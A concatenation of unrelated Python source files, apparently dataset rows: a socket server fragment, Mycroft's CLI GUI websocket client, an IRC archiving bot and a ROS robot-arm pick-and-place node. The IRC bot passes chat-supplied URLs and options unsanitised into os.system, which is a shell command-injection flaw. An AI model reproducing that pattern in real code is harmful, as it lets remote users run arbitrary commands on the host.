Accepts a connection in the order in which they were received.
Return the index of the connection, which can be used to send
and receive messages using that connection.
If no connection is already available or becomes available in the given
timeout, then the method returns -1.
:param timeout: Timeout to wait for receiving connection.
:type timeout: ``int``
:param accept_connection_sleep: Sleep time to retry accept connection.
:type accept_connection_sleep: ``float``
:return: Index of connection
:rtype: ``int``
"""
started = time.time()
while True:
if self.accepted_connections in self._fds:
self.accepted_connections += 1
return self.accepted_connections - 1
if time.time() > started + timeout:
return -1
time.sleep(accept_connection_sleep)
def receive(
self, size=1024, conn_idx=None, timeout=30, wait_full_size=True
):
"""
Receive a message of given size (number of bytes) from the given
connection.
:param size: Number of bytes to receive
:type size: ``int``
:param conn_idx: Index of connection to receive from
:type conn_idx: ``int``
:param timeout: timeout in seconds
:type timeout: ``int``
:param wait_full_size: Wait until full size is received.
:type wait_full_size: ``bool``
:return: message received
:rtype: ``bytes``
"""
conn_idx = self._validate_connection_idx(conn_idx)
# Get file descriptor and details of connection
fdesc = self._fds[conn_idx]
connection = self._connection_by_fd[fdesc]
connection.settimeout(timeout)
if wait_full_size is False:
connection.settimeout(timeout)
msg = connection.recv(size)
connection.settimeout(0)
else:
with self._lock:
msg = b""
try:
while len(msg) < size:
new_msg = connection.recv(size - len(msg))
if not new_msg:
raise Exception("Socket connection broken")
msg += new_msg
except socket.error:
if timeout == 0:
raise socket.timeout()
raise
return msg
def send(self, msg, conn_idx=None, timeout=30):
"""
Send the given message through the given connection.
:param msg: message to be sent
:type msg: ``bytes``
:param conn_idx: Index of connection to send to
:type conn_idx: ``int``
:param timeout: Timeout in seconds for sending all bytes
:type timeout: ``int``
:return: Number of bytes sent
:rtype: ``int``
"""
conn_idx = self._validate_connection_idx(conn_idx)
connection = self._connection_by_fd[self._fds[conn_idx]]
connection.settimeout(timeout)
with self._lock:
connection.sendall(msg)
return len(msg)
def close(self):
"""Closes the server and listen thread."""
self._listening = False
# self._serving may be stuck in select.select
if self._server_thread:
self._server_thread.join(timeout=0.1)
def _validate_connection_idx(self, conn_idx):
"""
Check if given connection index is valid.
If this is None, then the connection defaults to the one and only
existing active connection. If there are more active connections or the
initial connection is no longer valid this will fail.
:param conn_idx: Index of connection to send to
:type conn_idx: ``int``
:return: Connection index to send message to
:rtype: ``int``
"""
if conn_idx is None:
if self.accepted_connections > 1:
conn_idx = self.accepted_connections - 1
else:
conn_idx = 0
if self.accepted_connections == 0:
raise Exception("No connection accepted")
if conn_idx not in self._fds:
raise Exception("Connection {} not active".format(conn_idx))
return conn_idx
def _remove_all_connections(self):
"""
Unregister, close and remove all existing connections
:return: ``None``
:rtype: ``NoneType``
"""
for fdesc in self._connection_by_fd:
self._connection_by_fd[fdesc].close()
self._connection_by_fd = {}
self._fds = {}
|
gui_server.py
|
# Copyright 2018 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from os import getpid
from os.path import basename
import json
import websocket
from threading import Thread, Lock
from mycroft.messagebus.client.ws import WebsocketClient
from mycroft.messagebus.message import Message
bus = None
buffer = None # content will show on the CLI "GUI" representation
msgs = []
loaded = []
skill = None
page = None
vars = {}
def start_qml_gui(messagebus, output_buf):
global bus
global buffer
bus = messagebus
buffer = output_buf
# Initiate the QML GUI
log_message("Announcing CLI GUI")
bus.on('mycroft.gui.port', handle_gui_ready)
bus.emit(Message("mycroft.gui.connected",
{"gui_id": "cli_" + str(getpid())}))
log_message("Announced CLI GUI")
def log_message(msg):
global msgs
msgs.append(msg)
if len(msgs) > 20:
del msgs[0]
build_output_buffer()
def build_output_buffer():
global buffer
buffer.clear()
try:
if skill:
buffer.append("Active Skill: {}".format(skill))
buffer.append("Page: {}".format(basename(page)))
buffer.append("vars: ")
for v in vars[skill]:
buffer.append(" {}: {}".format(v, vars[skill][v]))
except Exception as e:
buffer.append(repr(e))
buffer.append("-----------------")
buffer.append("MESSAGES")
buffer.append("-----------------")
for m in msgs:
if len(buffer) > 20: # cap out at 20 lines total
return
buffer.append(m)
def handle_gui_ready(msg):
# Attempt to connect to the port
gui_id = msg.data.get("gui_id")
if not gui_id == "cli_" + str(getpid()):
# Not us, ignore!
return
# Create the websocket for GUI communications
port = msg.data.get("port")
if port:
log_message("Connecting CLI GUI on "+str(port))
ws = websocket.WebSocketApp("ws://0.0.0.0:" + str(port) + "/gui",
on_message=on_gui_message,
on_error=on_gui_error,
on_close=on_gui_close)
log_message("WS = "+str(ws))
event_thread = Thread(target=gui_connect, args=[ws])
event_thread.setDaemon(True)
event_thread.start()
def gui_connect(ws):
# Once the websocket has connected, just watch it for speak events
log_message("GUI Connected"+str(ws))
ws.on_open = on_gui_open
ws.run_forever()
def on_gui_open(ws):
log_message("GUI Opened")
def on_gui_message(ws, payload):
global loaded
global skill
global page
global vars
try:
msg = json.loads(payload)
log_message("Msg: "+str(payload))
type = msg.get("type")
if type == "mycroft.session.set":
skill = msg.get("namespace")
data = msg.get("data")
if skill not in vars:
vars[skill] = {}
for d in data:
vars[skill][d] = data[d]
elif type == "mycroft.session.list.insert":
# Insert new namespace
skill = msg.get('data')[0]['skill_id']
loaded.insert(0, [skill, []])
elif type == "mycroft.gui.list.insert":
# Insert a page in an existing namespace
page = msg['data'][0]['url']
pos = msg.get('position')
loaded[0][1].insert(pos, page)
skill = loaded[0][0]
elif type == "mycroft.session.list.move":
# Move the namespace at "pos" to the top of the stack
pos = msg.get('from')
loaded.insert(0, loaded.pop(pos))
elif type == "mycroft.events.triggered":
# Switch selected page of namespace
skill = msg['namespace']
pos = msg['data']['number']
for n in loaded:
if n[0] == skill:
page = n[1][pos]
build_output_buffer()
except Exception as e:
log_message(repr(e))
log_message("Invalid JSON: "+str(payload))
def on_gui_close(ws):
log_message("GUI closed")
def on_gui_error(ws, err):
log_message("GUI error: "+str(err))
|
main.py
|
import re
import socket
import threading
import os
import binascii
irc_server = 'irc.uworld.se'
irc_port = 6667
irc_channel = '#bibanon-ab'
irc_nick = 'archivebot'
irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
irc.connect((irc_server, irc_port))
exception_file = 'exceptions'
irc_log_file = 'irclog'
def irc_bot_listener():
while True:
irc_message = irc.recv(2048)
with open(irc_log_file, 'a') as file:
file.write(irc_message)
if 'PING :' in irc_message:
message = re.search(r'^[^:]+:(.*)$', irc_message).group(1)
irc.send('PONG :' + message + '\n')
elif re.search(r'^:.+PRIVMSG[^:]+:!.*', irc_message):
command = re.search(r'^:.+PRIVMSG[^:]+:(!.*)', irc_message).group(1).replace('\r', '').replace('\n', '').split(' ')
user = re.search(r'^:([^!]+)!', irc_message).group(1)
if command[0] in ('!a', '!archive', '!ao', '!archive-only', '!abort'):
command_archive(command, user)
def irc_bot_print(channel, message):
try:
irc.send("PRIVMSG " + channel + " :" + message + "\n")
except Exception as exception:
with open(exception_file, 'a') as exceptions:
exceptions.write(str(version) + '\n' + str(exception) + '\n\n')
irc_bot_join()
print("IRC BOT: " + message)
def command_archive(message, user):
if len(message) == 1:
irc_bot_print(irc_channel, user + ': What do you want to do?')
elif message[1].startswith('http://') or message[1].startswith('https://'):
if message[0] in ('!a', '!archive'):
threading.Thread(target = archive, args = (message, user, 'Site')).start()
elif message[0] in ('!ao', '!archive-only'):
threading.Thread(target = archive, args = (message+['--1'], user, 'Webpage')).start()
elif message[0] == '!abort':
if not message[1]:
irc_bot_print(irc_channel, user + ': Please specify a job.')
else:
for item in os.listdir('./'):
if item.endswith(message[1][:8]):
stopfile = './' + item + '/stop'
open(stopfile, 'w').close()
break
else:
irc_bot_print(irc_channel, user + ': No job was found running with ID ' + message[1] + '.')
else:
irc_bot_print(irc_channel, user + ': I can only handle http:// and https://.')
def dashboard():
os.system('~/.local/bin/gs-server')
def archive(message, user, kind):
job_id = binascii.hexlify(os.urandom(20))
concurrency = '3'
delay = '350-750'
optioncommands = ('--con', '--concurrency', '--delay')
commandslist = ('--igsets', '--no-offsite-links', '--igon', '--no-video', '--no-sitemaps', '--no-dupespotter', '--concurrency', '--delay', '--1')
for command in message[2:]:
if '=' in command:
if command.startswith('--concurrency') or command.startswith('--con'):
concurrency = command.split('=')[1]
elif command.startswith('--delay'):
delay = command.split('=')[1]
if not command.split('=')[0] in commandslist+optioncommands:
irc_bot_print(irc_channel, user + ': ' + command + ' is not supported.')
break
else:
irc_bot_print(irc_channel, user + ': ' + kind + ' ' + message[1] + ' is being archived with ID ' + job_id + '.')
finish = os.system('~/.local/bin/grab-site ' + message[1] + ' --id=' + job_id + ' --concurrency=' + concurrency + ' --delay=' + delay + ' ' + ' '.join([command for command in message[2:] if command in commandslist]) + ' --warc-max-size=524288000')
print(finish)
if finish == 0:
newmessage = message[1]
irc_bot_print(irc_channel, user + ': ' + kind + ' ' + message[1] + ' with ID ' + job_id + ' is archived.')
elif finish == 256:
irc_bot_print(irc_channel, user + ': ' + kind + ' ' + message[1] + ' with ID ' + job_id + ' was aborted.')
else:
irc_bot_print(irc_channel, user + ': ' + kind + ' ' + message[1] + ' with ID ' + job_id + ' is not archived correctly.')
def main():
irc.send('USER ' + irc_nick + ' ' + irc_nick + ' ' + irc_nick + ' :This is the bot for ' + irc_channel + '.\n')
irc.send('NICK ' + irc_nick + '\n')
irc.send('JOIN ' + irc_channel + '\n')
threading.Thread(target = irc_bot_listener).start()
threading.Thread(target = dashboard).start()
if __name__ == '__main__':
main()
|
out.py
|
#!/usr/bin/python3
# coding=utf8
# Date:2021/04/20
# Author:Aiden
import sys
import cv2
import math
import rospy
import threading
import numpy as np
from threading import Timer
from std_msgs.msg import *
from std_srvs.srv import *
from sensor_msgs.msg import Image
from warehouse.srv import *
from warehouse.msg import Grasp
from hiwonder_servo_msgs.msg import MultiRawIdPosDur
from kinematics import ik_transform
from armpi_fpv import bus_servo_control
# 出仓
# 如未声明,使用的长度,距离单位均为m
# 初始化
__target_data = ()
__isRunning = False
org_image_sub_ed = False
lock = threading.RLock()
ik = ik_transform.ArmIK()
# 初始位置
def initMove():
with lock:
bus_servo_control.set_servos(joints_pub, 1500, ((1, 75), (2, 500), (3, 80), (4, 825), (5, 625), (6, 500)))
rospy.sleep(2)
# 变量重置
def reset():
global __target_data
__target_data = ()
# app初始化调用
def init():
rospy.loginfo("out Init")
initMove()
reset()
def pick(grasps):
position = grasps.grasp_pos.position
rotation = grasps.grasp_pos.rotation
approach = grasps.grasp_approach
retreat = grasps.grasp_retreat
# 计算是否能够到达目标位置,如果不能够到达,返回False
target1 = ik.setPitchRanges((position.x + approach.x, position.y + approach.y, position.z + approach.z), rotation.r, -180, 0)
target2 = ik.setPitchRanges((position.x, position.y, position.z), rotation.r, -180, 0)
target3 = ik.setPitchRanges((position.x, position.y, position.z + grasps.up), rotation.r, -180, 0)
target4 = ik.setPitchRanges((position.x + retreat.x, position.y + retreat.y, position.z + retreat.z), rotation.r, -180, 0)
if not __isRunning:
return False
if target1 and target2 and target3 and target4:
# 第一步:云台转到朝向目标方向,夹持器打开
servo_data = target1[1]
bus_servo_control.set_servos(joints_pub, 800, ((1, grasps.pre_grasp_posture), (2, 500), (3, 80), (4, 825), (5, 625), (6, servo_data['servo6'])))
rospy.sleep(0.8)
if not __isRunning:
return False
# 第二步:移到接近点
bus_servo_control.set_servos(joints_pub, 500, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(0.5)
if not __isRunning:
return False
# 第三步:移到目标点
servo_data = target2[1]
bus_servo_control.set_servos(joints_pub, 500, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
if not __isRunning:
servo_data = target4[1]
bus_servo_control.set_servos(joints_pub, 1000, ((1, 200), (3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
return False
# 第四步:夹取
bus_servo_control.set_servos(joints_pub, 500, ((1, grasps.grasp_posture), ))
rospy.sleep(1)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, grasps.pre_grasp_posture), ))
rospy.sleep(0.5)
servo_data = target4[1]
bus_servo_control.set_servos(joints_pub, 1000, ((1, 200), (3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
return False
# 第五步:抬升
servo_data = target3[1]
if servo_data != target2[1]:
bus_servo_control.set_servos(joints_pub, 400, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(0.5)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, grasps.pre_grasp_posture), ))
rospy.sleep(0.5)
servo_data = target4[1]
bus_servo_control.set_servos(joints_pub, 1000, ((1, 200), (3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
return False
# 第六步:移到撤离点
servo_data = target4[1]
if servo_data != target3[1]:
bus_servo_control.set_servos(joints_pub, 500, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(0.5)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, grasps.pre_grasp_posture), ))
rospy.sleep(0.5)
return False
# 第七步:移到稳定点
servo_data = target1[1]
bus_servo_control.set_servos(joints_pub, 500, ((2, 500), (3, 80), (4, 825), (5, 625), (6, servo_data['servo6'])))
rospy.sleep(0.5)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, grasps.pre_grasp_posture), ))
rospy.sleep(0.5)
return False
return target2[2]
else:
rospy.loginfo('pick failed')
return False
def place(places):
position = places.grasp_pos.position
rotation = places.grasp_pos.rotation
approach = places.grasp_approach
retreat = places.grasp_retreat
# 计算是否能够到达目标位置,如果不能够到达,返回False
target1 = ik.setPitchRanges((position.x + approach.x, position.y + approach.y, position.z + approach.z), rotation.r, -180, 0)
target2 = ik.setPitchRanges((position.x, position.y, position.z), rotation.r, -180, 0)
target3 = ik.setPitchRanges((position.x, position.y, position.z + places.up), rotation.r, -180, 0)
target4 = ik.setPitchRanges((position.x + retreat.x, position.y + retreat.y, position.z + retreat.z), rotation.r, -180, 0)
if not __isRunning:
return False
if target1 and target2 and target3 and target4:
# 第一步:云台转到朝向目标方向
servo_data = target1[1]
bus_servo_control.set_servos(joints_pub, 800, ((1, places.pre_grasp_posture), (2, servo_data['servo6']), (3, 80), (4, 825), (5, 625), (6, servo_data['servo6'])))
rospy.sleep(0.8)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, places.grasp_posture), ))
rospy.sleep(0.5)
return False
# 第二步:移到接近点
bus_servo_control.set_servos(joints_pub, 1000, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, places.grasp_posture), ))
rospy.sleep(0.5)
return False
# 第三步:移到目标点
servo_data = target2[1]
if servo_data != target1[1]:
bus_servo_control.set_servos(joints_pub, 1000, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1.5)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, places.grasp_posture), ))
rospy.sleep(0.5)
servo_data = target4[1]
bus_servo_control.set_servos(joints_pub, 1000, ((1, 200), (3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
return False
# 第四步:放置
bus_servo_control.set_servos(joints_pub, 800, ((1, places.grasp_posture), ))
rospy.sleep(1)
if not __isRunning:
servo_data = target4[1]
bus_servo_control.set_servos(joints_pub, 1000, ((1, 200), (3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
return False
# 第五步:抬升
servo_data = target3[1]
if servo_data != target2[1]:
bus_servo_control.set_servos(joints_pub, 800, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(0.8)
if not __isRunning:
servo_data = target4[1]
bus_servo_control.set_servos(joints_pub, 1000, ((1, 200), (3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
return False
# 第六步:移到撤离点
servo_data = target4[1]
if servo_data != target3[1]:
bus_servo_control.set_servos(joints_pub, 500, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(0.5)
if not __isRunning:
return False
# 第七步:移到稳定点
servo_data = target1[1]
bus_servo_control.set_servos(joints_pub, 1000, ((2, 500), (3, 80), (4, 825), (5, 625), (6, servo_data['servo6'])))
rospy.sleep(1)
if not __isRunning:
return False
return True
else:
rospy.loginfo('place failed')
return False
#############################################
# 货架每层位置x, y, z(m)
shelf_position = {'R1':[0.277, 0, 0.02],
'R2':[0.277, 0, 0.12],
'R3':[0.277, 0, 0.21],
'L1':[-0.277, 0, 0.02],
'L2':[-0.277, 0, 0.12],
'L3':[-0.277, 0, 0.21]}
# 每层货架对应放置点位置x, y, z(m)
place_position = {'R1':[0.06, 0.15, 0.01],
'R2':[-0.06, 0.15, 0.01],
'R3':[0, 0.15, 0.01],
'L1':[0.06, 0.22, 0.015],
'L2':[-0.06, 0.22, 0.015],
'L3':[0, 0.22, 0.015]}
###############################################
# 每层放置时的俯仰角
roll_dict = {'R1': -130,
'R2': -120,
'R3': -90,
'L1': -130,
'L2': -120,
'L3': -90}
def move():
while True:
if __isRunning:
if len(__target_data) != 0:
i = __target_data[0]
if __isRunning:
if shelf_position[i][0] > 0:
approach_x = -0.07
else:
approach_x = 0.07
grasps = Grasp()
# 夹取的位置
grasps.grasp_pos.position.x = shelf_position[i][0]
grasps.grasp_pos.position.y = shelf_position[i][1]
grasps.grasp_pos.position.z = shelf_position[i][2]
# 夹取时的俯仰角
grasps.grasp_pos.rotation.r = roll_dict[i]
# 夹取后抬升的距离
grasps.up = 0
# 夹取时靠近的方向和距离
grasps.grasp_approach.x = approach_x
# 夹取后后撤的方向和距离
grasps.grasp_retreat.x = approach_x
grasps.grasp_retreat.z = 0.02
# 夹取前后夹持器的开合
grasps.grasp_posture = 450
grasps.pre_grasp_posture = 75
buzzer_pub.publish(0.1)
result = pick(grasps)
if result:
if place_position[i][0] < 0:
yaw = int(120 - (90 + math.degrees(math.atan2(place_position[i][0], place_position[i][1]))))
else:
yaw = int(120 + (90 - math.degrees(math.atan2(place_position[i][0], place_position[i][1]))))
places = Grasp()
places.grasp_pos.position.x = place_position[i][0]
places.grasp_pos.position.y = place_position[i][1]
places.grasp_pos.position.z = place_position[i][2]
places.grasp_pos.rotation.r = -160
places.up = 0.045
places.grasp_approach.z = places.up
places.grasp_retreat.z = places.up
places.grasp_posture = 75
places.pre_grasp_posture = 450
place(places)
try:
__target_data.remove(i)
except BaseException as e:
print(e)
initMove()
else:
rospy.sleep(0.01)
else:
rospy.sleep(0.01)
th = threading.Thread(target=move)
th.setDaemon(True)
th.start()
# 将ros发布的图像转化成opencv能够处理的格式,并且将处理后的图像发布出去
def image_callback(ros_image):
global lock
image = np.ndarray(shape=(ros_image.height, ros_image.width, 3), dtype=np.uint8,
buffer=ros_image.data) # 将自定义图像消息转化为图像
cv2_img = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
frame = cv2_img.copy()
frame_result = frame
rgb_image = cv2.cvtColor(frame_result, cv2.COLOR_BGR2RGB).tostring()
ros_image.data = rgb_image
image_pub.publish(ros_image)
def enter_func(msg):
global lock
global image_sub
global __isRunning
global org_image_sub_ed
rospy.loginfo("enter out")
with lock:
init()
if not org_image_sub_ed:
org_image_sub_ed = True
image_sub = rospy.Subscriber('/usb_cam/image_raw', Image, image_callback)
return [True, 'enter']
heartbeat_timer = None
def exit_func(msg):
global lock
global image_sub
global __isRunning
global org_image_sub_ed
rospy.loginfo("exit out")
with lock:
__isRunning = False
try:
if org_image_sub_ed:
org_image_sub_ed = False
heartbeat_timer.cancel()
image_sub.unregister()
except:
pass
return [True, 'exit']
def start_running():
global lock
global __isRunning
rospy.loginfo("start running out")
with lock:
__isRunning = True
def stop_running():
global lock
global __isRunning
rospy.loginfo("stop running out")
with lock:
__isRunning = False
reset()
def set_running(msg):
if msg.data:
start_running()
else:
stop_running()
return [True, 'set_running']
def set_target(msg):
global lock
global __target_data
rospy.loginfo('%s', msg)
with lock:
__target_data = msg.position
return [True, 'set_target']
def heartbeat_srv_cb(msg):
global heartbeat_timer
if isinstance(heartbeat_timer, Timer):
heartbeat_timer.cancel()
if msg.data:
heartbeat_timer = Timer(5, rospy.ServiceProxy('/out/exit', Trigger))
heartbeat_timer.start()
rsp = SetBoolResponse()
rsp.success = msg.data
return rsp
if __name__ == '__main__':
# 初始化节点
rospy.init_node('out', log_level=rospy.DEBUG)
# 舵机发布
joints_pub = rospy.Publisher('/servo_controllers/port_id_1/multi_id_pos_dur', MultiRawIdPosDur, queue_size=1)
# 图像发布
image_pub = rospy.Publisher('/out/image_result', Image, queue_size=1) # register result image publisher
# app通信服务
enter_srv = rospy.Service('/out/enter', Trigger, enter_func)
exit_srv = rospy.Service('/out/exit', Trigger, exit_func)
running_srv = rospy.Service('/out/set_running', SetBool, set_running)
set_target_srv = rospy.Service('/out/set_target', SetOutTarget, set_target)
heartbeat_srv = rospy.Service('/out/heartbeat', SetBool, heartbeat_srv_cb)
buzzer_pub = rospy.Publisher('/sensor/buzzer', Float32, queue_size=1)
debug = False
if debug:
rospy.sleep(0.2)
enter_func(1)
msg = SetOutTarget()
msg.position = ['R1', 'R2', 'R3', 'L1', 'L2', 'L3']
set_target(msg)
start_running()
try:
rospy.spin()
except KeyboardInterrupt:
rospy.loginfo("Shutting down")
cv2.destroyAllWindows()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.